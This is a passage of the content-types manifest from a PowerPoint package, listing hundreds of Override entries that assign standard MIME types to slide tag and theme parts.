  <Override PartName="/ppt/tags/tag950.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag951.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag952.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag953.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag954.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag955.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag956.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag957.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag958.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag959.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag96.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag960.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag961.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag962.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag963.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag964.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag965.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag966.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag967.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag968.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag969.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag97.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag970.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag971.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag972.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag973.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag974.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag975.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag976.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag977.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag978.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag979.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag98.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag980.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag981.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag982.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag983.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag984.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag985.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag986.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag987.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag988.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag989.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag99.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag990.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag991.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag992.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag993.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag994.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag995.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag996.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag997.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag998.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag999.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme10.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme100.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme101.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme102.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme103.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme104.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme105.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme106.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme107.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme108.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme109.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme11.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme110.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme111.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme112.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme113.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme114.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme115.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme116.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme117.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme118.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme119.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme12.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme120.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme121.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme122.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme123.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme124.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme125.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme126.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme127.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme128.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme129.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme13.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme130.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme131.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme132.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme133.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme134.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme135.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme136.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme137.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme138.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme139.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme14.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme140.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme141.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme142.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme143.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme144.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme145.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme146.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme147.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme148.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme149.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme15.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme150.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme151.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme152.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme153.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme154.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme155.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme156.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme157.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme158.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme159.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme16.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme160.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme161.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme162.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme163.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme164.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme165.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme166.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme167.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme168.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme169.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme17.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme170.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme171.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme172.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme173.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme174.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme175.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme176.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme177.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme178.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme179.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme18.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme180.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme181.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme182.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme183.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme184.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme185.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme186.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme187.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme188.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme189.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme19.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme190.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme191.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme192.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme193.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme194.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme195.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme196.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme197.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme198.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme199.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme2.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme20.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme200.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme201.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme202.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme203.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme204.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme205.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme206.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme207.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme208.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme209.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme21.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme210.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme211.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme212.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme213.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme214.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme215.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme216.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme217.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme218.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme219.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme22.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme220.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme221.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme222.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme223.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme224.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme225.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme226.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme227.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme228.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme229.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme23.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme230.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme231.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme232.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme233.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme234.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme235.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme236.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme237.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme238.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme239.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme24.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme240.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme241.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme242.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme243.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme244.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme245.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme246.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme247.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme248.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme249.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme25.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme250.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme251.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme252.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme253.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme254.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme255.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme256.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme257.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme258.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme259.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme26.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme260.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme261.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme262.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme263.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme264.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme265.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme266.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme267.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme268.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme269.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme27.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme270.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme271.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme272.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme273.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme274.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme275.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme276.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme277.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme278.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme279.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme28.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme280.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme281.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme282.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme283.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme284.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme285.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme286.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme287.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme288.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme29.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme3.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme30.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
